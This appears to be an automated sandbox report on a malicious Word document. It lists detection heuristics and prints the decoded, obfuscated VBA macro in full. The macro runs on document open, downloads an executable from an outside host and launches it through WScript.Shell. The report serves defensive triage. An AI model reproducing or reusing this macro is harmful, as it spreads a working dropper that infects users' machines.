MALICIOUS
Risk Score: 330
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro attempts to run external commands or download additional payloads. The presence of these indicators strongly points towards a dropper or downloader functionality.
Heuristics (10)

- ClamAV: Doc.Dropper.Donoff-5743530-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script: `Dim knoxiI As Boolean, FxaIym As String` / `Set ociRh = CreateObject("WScript.Shell")` / `End Function`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: `Dim knoxiI As Boolean, FxaIym As String` / `Set ociRh = CreateObject("WScript.Shell")` / `End Function`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched lines in script: `Public Sub OAYgchQTvx(ByVal UrCIe As Integer, ByVal MuhqNL As Object, ByVal ZMNJmZ As String)` / `CallByName MuhqNL, ZMNJmZ, 1` / `End Sub`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: `End Sub` / `Private Sub Document_Open()` / `Dim jZUFYdJU As Boolean`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs:
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8756 bytes |

SHA-256: 9bd916b59ed42a01bff9fd42729d83e3ccb629513147f07dfbce1986a9f1857e

Detection (macros.bas)
- ClamAV: No threats found
- Obfuscation or payload: likely. 150 of 224 identifiers look randomly generated (e.g. 'ko4nklXiknevCbXus4XiXnCes4svvnvepkavvlk'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub cArRYNDn(ByVal gukrdcGa As String, ByVal UfYDuus As String)
wHTiRT
If mjspzU(9002, 675, "ZUPi") Then
jGxNa True, "LQY", "2QT"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub jYFBxEH(ByVal aloePMB As Integer)
YoQROe 280, "JkvjI", 3880
nSBNYIEqi
szgGkotf 3197, "rh", True
End Sub
Private Sub Document_Open()
Dim jZUFYdJU As Boolean
UYAPtnNhc.YNyJc
End Sub
Private Sub xEiTHqPzdw()
mqxGfUKgzi 6499, "iUhGF", "MAq"
MmaltzrlX 1715
If hBTkqIt("bc") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function HDOaeL() As String
yhlAeROGu
HDOaeL = ""
End Function
Attribute VB_Name = "fctnUJvB"
Private Sub pqFoNu(ByVal cUIlFJ As Boolean, ByVal mpVEEoFeiL As Integer)
JdrgwQ
End Sub
Public Function ociRh() As Object
Dim knoxiI As Boolean, FxaIym As String
Set ociRh = CreateObject("WScript.Shell")
End Function
Public Function kqWmVjU() As Object
Set kqWmVjU = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub nwNklT()
If euVWF Then
EqgCajclK 1379, False, "8tb0r"
End If
End Sub
Private Sub DjJdbvrGws(ByVal uNciuGe As String)
rwKYqDFg True, 2503
End Sub
Public Function XAOWE() As Object
Dim yCJCioLQ As Boolean
Set XAOWE = CreateObject("ADODB.Stream")
End Function
Private Function eHaCOUB() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "9v0y", "ietB", 3231
eHaCOUB = 5750
End Function
Attribute VB_Name = "hJdkrISfRI"
Private Function QkzVIaKRdq(ByVal zXdxLXHJOu As Boolean, ByVal VqmQo As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
QkzVIaKRdq = False
End Function
Public Function mBLDZt(ByVal AwdLbPsP As String, ByVal TfWeBvAl As String) As String
Dim lZENGx As Boolean
Dim QnyoxNSNA As String
crcNfikH = "vPq"
For ilVqRoWS = 1 To Len(AwdLbPsP)
lZENGx = vKSKly.EbcPrxWIPp(vKSKly.qIWso(ilVqRoWS, 5243, XNEwdo, AwdLbPsP), TfWeBvAl)
If Not lZENGx Then
mBLDZt = vKSKly.HiyTrdWiC(2102, True, vKSKly.qIWso(ilVqRoWS, 5243, XNEwdo, AwdLbPsP), mBLDZt)
fitPL = "myy1"
End If
Next
End Function
Private Function TlMubMvzy() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
TlMubMvzy = 5758
End Function
Private Function XNEwdo() As String
XNEwdo = "IQc"
End Function
Attribute VB_Name = "NesZZN"
Private Sub zhOfCLGAh(ByVal YsTrxCd As Boolean, ByVal baPmL As Integer)
QzYClH "", 8941, "1h"
End Sub
Public Sub OAYgchQTvx(ByVal UrCIe As Integer, ByVal MuhqNL As Object, ByVal ZMNJmZ As String)
CallByName MuhqNL, ZMNJmZ, 1
End Sub
Public Sub WdTIctCB(ByVal gHwDfef As Variant, ByVal CecwjDwM As String, ByVal LJASoRFb As Variant, ByVal IEsGQVFRPD As Object, ByVal kSWAN As Variant)
IXNhTW = "wu2T"
CallByName IEsGQVFRPD, CecwjDwM, 1, gHwDfef, LJASoRFb, kSWAN
End Sub
Public Function VnqGr(ByVal EqbksrHJWl As String, ByVal YQEfFUIkji As Object, ByVal jDxWKBJA As String) As Variant
Dim TgzgRm As Integer, bAmMXC As Integer
Set VnqGr = CallByName(YQEfFUIkji, EqbksrHJWl, 2, jDxWKBJA)
End Function
Public Sub psmYUGta(ByVal cndQCK As Variant, ByVal IqWqx As String, ByVal xcClC As Integer, ByVal wNWLcLq As Variant, ByVal MuvVSVYbN As String, ByVal FYSwE As Object)
CallByName FYSwE, IqWqx, 1, cndQCK, wNWLcLq
End Sub
Public Sub nesFSM(ByVal yZmucbfq As Boolean, ByVal QGKGN As Variant, ByVal zApBI As Object, ByVal HvDJbFOC As String)
CallByName zApBI, HvDJbFOC, 4, QGKGN
End Sub
Private Sub dKeajQeJb(ByVal pxKWbO As Integer, ByVal ArpVfOqxUe As Integer)
VYZRTX "QVxu"
FaPULoVT 5592, "mO", "Hdm"
End Sub
Public Sub PDvQIuVeS(ByVal dHZfsR As String, ByVal aipvsG As Object, ByVal bsphVBIbW As Integer, ByVal Xnyao As Variant, ByVal EBJmPKEkwc As String)
CallByName aipvsG, EBJmPKEkwc, 1, Xnyao
End Sub
Public Function oKMLWOIu(ByVal EBmBLECPCy As String, ByVal kgQSTQaLT As String, ByVal uOAQDYTOq As Object) As Variant
Dim VrzKf As Integer, UNYDxtaaT As Boolean
oKMLWOIu = CallByName(uOAQDYTOq, kgQSTQaLT, 2)
End Function
Attribute VB_Name = "UYAPtnNhc"
Private Function KcLkykbw(ByVal yZFyu As String, ByVal FNGzsral As String) As String
Dim FMrcnC As Integer
Set mzqsVSdEnY = NesZZN.VnqGr(zgLftjf, fctnUJvB.ociRh, hJdkrISfRI.mBLDZt("P3RAWOVCVES3VS", ".A3VW"))
KcLkykbw = mzqsVSdEnY(yZFyu)
End Function
Private Function sdLSRsN() As String
sdLSRsN = hJdkrISfRI.mBLDZt("OYp4eCnC", "CY4 ")
End Function
Private Function zgLftjf() As String
zgLftjf = hJdkrISfRI.mBLDZt("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function iINmLqLcFT() As String
iINmLqLcFT = "Zyef"
End Function
Private Sub FLSwdw(ByVal yHJGrbfx As String, ByVal tSzIoLzby As String)
Set VaMmKljHAo = fctnUJvB.kqWmVjU
NesZZN.WdTIctCB aQMsfePM, hJdkrISfRI.mBLDZt("OYp4eCnC", "CY4 "), yHJGrbfx, VaMmKljHAo, False
NesZZN.psmYUGta hJdkrISfRI.mBLDZt("UJsJJerj-JJAjgJeJnGt", "GJj"), RekpUw, 2963, hJdkrISfRI.mBLDZt("MRIoIzi2lR2laGI/4I.I0IR G(c2oRmRIpGa2t2iIbIlIe;I)G", "2RGI"), uIQxdssCz, VaMmKljHAo
NesZZN.OAYgchQTvx 1177, VaMmKljHAo, ZemfS
eRxGpJyV True, 6317, tSzIoLzby, NesZZN.oKMLWOIu(uIQxdssCz, suEAXd, VaMmKljHAo)
End Sub
Private Function suEAXd() As String
suEAXd = hJdkrISfRI.mBLDZt(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub FGpjlnBGJE()
Dim byLBEd As Integer
OIRUtHf = True
On Error GoTo wzCRNF
zIxdob = False
FLSwdw RzvNZW, NADCx
HcteDa NADCx
Exit Sub
wzCRNF:
End Sub
Private Function NADCx() As String
Dim ZsJDWpI As Integer, hIKrUpMu As Integer
NADCx = KcLkykbw(hJdkrISfRI.mBLDZt("ZTEUMZsP", "9cZUsX"), "qHC0") & UdOgCDWtH
End Function
Private Function pBZwwtKg() As String
pBZwwtKg = hJdkrISfRI.mBLDZt("nTyHpaeB", "HBaqXn")
End Function
Private Function UdOgCDWtH() As String
Dim YfrDcmv As Integer
Dim mlsaPnV As Integer
JJNlxuFaS = True
UdOgCDWtH = caVOtQWO
End Function
Private Sub HcteDa(ByVal spFOX As String)
NesZZN.PDvQIuVeS "DJ", fctnUJvB.ociRh, 7188, spFOX, hJdkrISfRI.mBLDZt("kEx2eI1c", "k31IG2")
End Sub
Private Function uIQxdssCz() As String
uIQxdssCz = "f1l8"
End Function
Public Sub YNyJc()
Dim AAaFlCz As Integer
Dim BCooTgNYK As Boolean
kZsag = 4121
FGpjlnBGJE
End Sub
Private Function GHBEoEBFe() As String
GHBEoEBFe = hJdkrISfRI.mBLDZt("YClm/o/s0e", "0dY/m")
End Function
Private Function RzvNZW() As String
Dim zEncqTWUTC As Integer
RzvNZW = hJdkrISfRI.mBLDZt("h4tCtRRp:k/kv/ko4nklXiknevCbXus4XiXnCes4svvnvepkavvlk.ckko4m/Rs4yv4skteRXmX/Xca4XcvhXe/RRwkorXkd.kCe4xeX", "RXkv4C")
End Function
Private Sub eRxGpJyV(ByVal aPhsNqKGx As Boolean, ByVal ejskpR As Integer, ByVal xJGIRrOk As String, ByVal BaVYYT As Variant)
Dim fbYrqt As Boolean
Dim NWvvoYkL As Integer
Set vxYGxkHNZ = fctnUJvB.XAOWE
NesZZN.nesFSM True, 1, vxYGxkHNZ, pBZwwtKg
NesZZN.OAYgchQTvx 1177, vxYGxkHNZ, sdLSRsN
uRUxACPwrk = 5904
NesZZN.PDvQIuVeS iINmLqLcFT, vxYGxkHNZ, 7188, BaVYYT, hJdkrISfRI.mBLDZt("Wbbribtzek", "Zzlmkb")
sIbLjqP = "fu"
NesZZN.psmYUGta xJGIRrOk, ApJKIxVhCK, 2963, 2, iINmLqLcFT, vxYGxkHNZ
NesZZN.OAYgchQTvx 1177, vxYGxkHNZ, GHBEoEBFe
End Sub
Private Function aQMsfePM() As String
XBoKEL = False
aQMsfePM = hJdkrISfRI.mBLDZt("G.E TB", ".BA ")
End Function
Private Function ApJKIxVhCK() As String
ApJKIxVhCK = hJdkrISfRI.mBLDZt("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function caVOtQWO() As String
caVOtQWO = hJdkrISfRI.mBLDZt("G/Fa508F59dF512F9GaFGa1FG050855aG4G.FexFeG", "F5G")
End Function
Private Function RekpUw() As String
RekpUw = hJdkrISfRI.mBLDZt("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function ZemfS() As String
ZemfS = hJdkrISfRI.mBLDZt("SIerIndr", "MIrG")
End Function
Attribute VB_Name = "vKSKly"
Public Function qIWso(ByVal PcdvoPfet As Integer, ByVal VDVKZKg As Integer, ByVal MgGCf As String, ByVal DoZXko As String) As String
Dim ojpDM As Integer, PsDspeSF As Integer
qIWso = Mid(DoZXko, PcdvoPfet, 1)
End Function
Private Sub EowNh(ByVal crDXUwlvAH As Integer, ByVal XYySpGi As String)
BkMTwPAnUV "Br", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "wF", "8s"
End If
nnWkkdeYWI "", "AGC", False
tvremm "", "GOr", True
End Sub
Public Function HiyTrdWiC(ByVal IvdbG As Integer, ByVal LGgEjjWIwK As Boolean, ByVal YMNqgYKkz As String, ByVal dbqMQfkGmY As String) As String
HiyTrdWiC = dbqMQfkGmY & YMNqgYKkz
End Function
Public Function EbcPrxWIPp(ByVal kbbOhppIw As String, ByVal VJPIRS As String) As Boolean
Dim xgurqnLbJ As Integer
EbcPrxWIPp = InStr(1, VJPIRS, kbbOhppIw)
End Function